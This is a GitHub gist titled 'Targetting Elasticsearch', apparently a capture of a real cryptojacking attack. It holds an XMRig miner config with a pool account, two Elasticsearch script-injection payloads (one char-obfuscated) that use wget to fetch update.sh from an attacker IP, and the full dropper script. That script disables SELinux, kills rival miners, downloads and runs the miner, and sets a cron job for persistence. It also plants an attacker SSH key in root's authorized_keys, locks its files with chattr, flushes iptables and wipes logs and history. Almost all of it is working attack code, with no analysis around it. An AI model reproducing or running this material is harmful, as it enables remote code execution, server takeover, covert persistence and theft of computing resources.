Last active
November 29, 2018 20:36
-
-
Save nl5887/931fd3948bec28908ba3b317926e0a2f to your computer and use it in GitHub Desktop.
Targetting Elasticsearch
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "algo": "cryptonight", // cryptonight (default) or cryptonight-lite | |
| "av": 0, // algorithm variation, 0 auto select | |
| "background": true, // true to run the miner in the background | |
| "colors": true, // false to disable colored output | |
| "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1 | |
| "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest) | |
| "donate-level": 3, // donate level, mininum 1% | |
| "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log" | |
| "max-cpu-usage": 65, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option. | |
| "print-time": 60, // print hashrate report every N seconds | |
| "retries": 5, // number of times to retry before switch to backup server | |
| "retry-pause": 5, // time to pause between retries | |
| "safe": false, // true to safe adjust threads and av settings for current CPU | |
| "syslog": false, // use system log for output messages | |
| "huge-pages": true, // huge pages support | |
| "threads": 5, // number of miner threads | |
| "pools": [ | |
| { | |
| "url": "xmr.pool.minergate.com:45700", // URL of mining server | |
| "user": "alksjewio@protonmail.com", | |
| "pass": "x", // password for mining server | |
| "rig-id": null, | |
| "nicehash": false, // enable nicehash/xmrig-proxy support | |
| "keepalive": true, // send keepalived for prevent timeout (need pool support) | |
| "variant": -1, // algorithm PoW variant | |
| "tls": false, // enable SSL/TLS support (needs pool support) | |
| "tls-fingerprint": null | |
| } | |
| ], | |
| "user-agent": null, // set custom user-agent string for pool | |
| "api": { | |
| "port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API | |
| "access-token": null, // access token for API | |
| "id": null, | |
| "worker-id": null, // custom worker-id for API | |
| "ipv6": false, | |
| "restricted": true | |
| }, | |
| "asm": true, // ASM code for cn/2, possible values: auto, none, intel, ryzen. | |
| "autosave": true, | |
| "watch": false, | |
| "hw-aes": null | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // request | |
| http.url:/_search?source | |
| {"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[] {\"/bin/bash\",\"-c\",((char)119+(char)103+(char)101+(char)116+(char)32+(char)104+(char)116+(char)116+(char)112+(char)58+(char)47+(char)47+(char)54+(char)57+(char)46+(char)51+(char)48+(char)46+(char)50+(char)48+(char)51+(char)46+(char)49+(char)55+(char)48+(char)47+(char)103+(char)76+(char)109+(char)119+(char)68+(char)85+(char)56+(char)54+(char)114+(char)57+(char)112+(char)77+(char)51+(char)114+(char)88+(char)102+(char)47+(char)117+(char)112+(char)100+(char)97+(char)116+(char)101+(char)46+(char)115+(char)104+(char)32+(char)45+(char)80+(char)32+(char)47+(char)116+(char)109+(char)112+(char)47+(char)115+(char)115+(char)115+(char)111+(char)111+(char)111).toString() }).getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|\");}sb.toString();"}}, "size": 1} | |
| // _search?pretty | |
| {"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\").getText()"}}} | |
| https://www.virustotal.com/#/file/191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c/detection |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| setenforce 0 2>dev/null | |
| echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null | |
| sync && echo 3 >/proc/sys/vm/drop_caches | |
| crondir='/var/spool/cron/'"$USER" | |
| cont=`cat ${crondir}` | |
| ssht=`cat /root/.ssh/authorized_keys` | |
| echo 1 > /etc/devtools | |
| rtdir="/etc/devtools" | |
| bbdir="/usr/bin/curl" | |
| bbdira="/usr/bin/url" | |
| ccdir="/usr/bin/wget" | |
| ccdira="/usr/bin/get" | |
| mv /usr/bin/wget /usr/bin/get | |
| mv /usr/bin/curl /usr/bin/url | |
| ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9 | |
| ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9 | |
| ps ax|grep -o './[0-9]* -c'| xargs pkill -f | |
| pkill -f biosetjenkins | |
| pkill -f Loopback | |
| pkill -f apaceha | |
| pkill -f cryptonight | |
| pkill -f stratum | |
| pkill -f mixnerdx | |
| pkill -f performedl | |
| pkill -f JnKihGjn | |
| pkill -f irqba2anc1 | |
| pkill -f irqba5xnc1 | |
| pkill -f irqbnc1 | |
| pkill -f ir29xc1 | |
| pkill -f conns | |
| pkill -f irqbalance | |
| pkill -f crypto-pool | |
| pkill -f minexmr | |
| pkill -f XJnRj | |
| pkill -f mgwsl | |
| pkill -f pythno | |
| pkill -f jweri | |
| pkill -f lx26 | |
| pkill -f NXLAi | |
| pkill -f BI5zj | |
| pkill -f askdljlqw | |
| pkill -f minerd | |
| pkill -f minergate | |
| pkill -f Guard.sh | |
| pkill -f ysaydh | |
| pkill -f bonns | |
| pkill -f donns | |
| pkill -f kxjd | |
| pkill -f Duck.sh | |
| pkill -f bonn.sh | |
| pkill -f conn.sh | |
| pkill -f kworker34 | |
| pkill -f kw.sh | |
| pkill -f pro.sh | |
| pkill -f polkitd | |
| pkill -f acpid | |
| pkill -f icb5o | |
| pkill -f nopxi | |
| pkill -f irqbalanc1 | |
| pkill -f minerd | |
| pkill -f i586 | |
| pkill -f gddr | |
| pkill -f mstxmr | |
| pkill -f ddg.2011 | |
| pkill -f wnTKYg | |
| pkill -f deamon | |
| pkill -f disk_genius | |
| pkill -f sourplum | |
| pkill -f polkitd | |
| pkill -f nanoWatch | |
| pkill -f zigw | |
| crontab -r | |
| if [ -f "$rtdir" ] | |
| then | |
| echo "i am root" | |
| echo "goto 1" >> /etc/devtools | |
| chattr -i /etc/devtool* | |
| chattr -i /etc/config.json* | |
| chattr -i /etc/update.sh* | |
| chattr -i /root/.ssh/authorized_keys* | |
| [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/10 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - | |
| chmod 700 /root/.ssh/ | |
| echo >> /root/.ssh/authorized_keys | |
| chmod 600 root/.ssh/authorized_keys | |
| echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAuna/E/UUQaGkVWuD613/07snQnMGFpOq3HlK9SNAEgXt3WwOPCHX6buuDTizo1dZFSbAK7ung0Ff4sYSN11hNeafySGivNBsRVnZGTJweUGOvXHuevIxlnEghaJ387SBNXEJwJUNLjoWbsTsYPF5GDt4RUJiLq2hVRyUQpxTX6G8MQWJ5t8A0WMGRzwxwNr7acS8NwNZ7PtedmGyXWGAnyg3CD3YT0kO+IaiX4i2mtLGNYxniHc/RK5Ba3r8LzuWvOlgXb9rGuCvGHKml+fYjQFUmGQse9Sfyqglm+rrQVQefphgEU0DG9JXvufmybc6XYqcNJfJnGIU8pz4p0QS0Q== root@s137446.wholesaleinternet.net" >> /root/.ssh/authorized_keys | |
| rm /etc/devtool* | |
| rm /etc/config.json* | |
| rm /etc/update.sh* | |
| rm /root/.ssh/authorized_keys* | |
| cfg="/etc/config.json" | |
| file="/etc/devtool" | |
| if [ -f "$bbdir" ] | |
| then | |
| curl --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/config.json > /etc/config.json | |
| elif [ -f "$bbdira" ] | |
| then | |
| url --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/config.json > /etc/config.json | |
| elif [ -f "$ccdir" ] | |
| then | |
| wget --timeout=10 --tries=100 -P /etc http://69.30.203.170/gLmwDU86r9pM3rXf/config.json | |
| elif [ -f "$ccdira" ] | |
| then | |
| get --timeout=10 --tries=100 -P /etc http://69.30.203.170/gLmwDU86r9pM3rXf/config.json | |
| fi | |
| if [ -f "$bbdir" ] | |
| then | |
| curl --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/devtool > /etc/devtool | |
| elif [ -f "$bbdira" ] | |
| then | |
| url --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/devtool > /etc/devtool | |
| elif [ -f "$ccdir" ] | |
| then | |
| wget --timeout=10 --tries=100 -P /etc http://69.30.203.170/gLmwDU86r9pM3rXf/devtool | |
| elif [ -f "$ccdira" ] | |
| then | |
| get --timeout=10 --tries=100 -P /etc http://69.30.203.170/gLmwDU86r9pM3rXf/devtool | |
| fi | |
| if [ -f "$bbdir" ] | |
| then | |
| curl --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh > /etc/update.sh | |
| elif [ -f "$bbdira" ] | |
| then | |
| url --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh > /etc/update.sh | |
| elif [ -f "$ccdir" ] | |
| then | |
| wget --timeout=10 --tries=100 -P /etc http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh | |
| elif [ -f "$ccdira" ] | |
| then | |
| get --timeout=10 --tries=100 -P /etc http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh | |
| fi | |
| chmod 777 /etc/devtool | |
| ps -fe|grep devtool |grep -v grep | |
| if [ $? -ne 0 ] | |
| then | |
| cd /etc | |
| echo "not root runing" | |
| sleep 5s | |
| ./devtool | |
| else | |
| echo "root runing....." | |
| fi | |
| chmod 777 /etc/devtool | |
| chattr +i /etc/devtool | |
| chmod 777 /etc/config.json | |
| chattr +i /etc/config.json | |
| chmod 777 /etc/update.sh | |
| chattr +i /etc/update.sh | |
| chmod 777 /root/.ssh/authorized_keys | |
| chattr +i /root/.ssh/authorized_keys | |
| else | |
| echo "goto 1" > /tmp/devtools | |
| chattr -i /tmp/devtool* | |
| chattr -i /tmp/config.json* | |
| chattr -i /tmp/update.sh* | |
| rm /tmp/devtool* | |
| rm /tmp/config.json* | |
| rm /tmp/update.sh* | |
| [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/10 * * * * sh /tmp/update.sh >/dev/null 2>&1") | crontab - | |
| if [ -f "$bbdir" ] | |
| then | |
| curl --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/config.json > /tmp/config.json | |
| elif [ -f "$bbdira" ] | |
| then | |
| url --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/config.json > /tmp/config.json | |
| elif [ -f "$ccdir" ] | |
| then | |
| wget --timeout=10 --tries=100 -P /tmp http://69.30.203.170/gLmwDU86r9pM3rXf/config.json | |
| elif [ -f "$ccdira" ] | |
| then | |
| get --timeout=10 --tries=100 -P /tmp http://69.30.203.170/gLmwDU86r9pM3rXf/config.json | |
| fi | |
| if [ -f "$bbdir" ] | |
| then | |
| curl --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/devtool > /tmp/devtool | |
| elif [ -f "$bbdira" ] | |
| then | |
| url --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/devtool > /tmp/devtool | |
| elif [ -f "$ccdir" ] | |
| then | |
| wget --timeout=10 --tries=100 -P /tmp http://69.30.203.170/gLmwDU86r9pM3rXf/devtool | |
| elif [ -f "$ccdira" ] | |
| then | |
| get --timeout=10 --tries=100 -P /tmp http://69.30.203.170/gLmwDU86r9pM3rXf/devtool | |
| fi | |
| if [ -f "$bbdir" ] | |
| then | |
| curl --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh > /tmp/update.sh | |
| elif [ -f "$bbdira" ] | |
| then | |
| url --connect-timeout 10 --retry 100 http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh > /tmp/update.sh | |
| elif [ -f "$ccdir" ] | |
| then | |
| wget --timeout=10 --tries=100 -P /tmp http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh | |
| elif [ -f "$ccdira" ] | |
| then | |
| get --timeout=10 --tries=100 -P /tmp http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh | |
| fi | |
| ps -fe|grep devtool |grep -v grep | |
| if [ $? -ne 0 ] | |
| then | |
| echo "not tmp runing" | |
| cd /tmp | |
| chmod 777 devtool | |
| sleep 5s | |
| ./devtool | |
| else | |
| echo "tmp runing....." | |
| fi | |
| chmod 777 /tmp/devtool | |
| chattr +i /tmp/devtool | |
| chmod 777 /tmp/update.sh | |
| chattr +i /tmp/update.sh | |
| chmod 777 /tmp/config.json | |
| chattr +i /tmp/config.json | |
| fi | |
| iptables -F | |
| iptables -X | |
| iptables -A OUTPUT -p tcp --dport 3333 -j DROP | |
| iptables -A OUTPUT -p tcp --dport 5555 -j DROP | |
| iptables -A OUTPUT -p tcp --dport 7777 -j DROP | |
| iptables -A OUTPUT -p tcp --dport 9999 -j DROP | |
| service iptables reload | |
| ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9 | |
| history -c | |
| echo > /var/spool/mail/root | |
| echo > /var/log/wtmp | |
| echo > /var/log/secure | |
| echo > /root/.bash_history |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment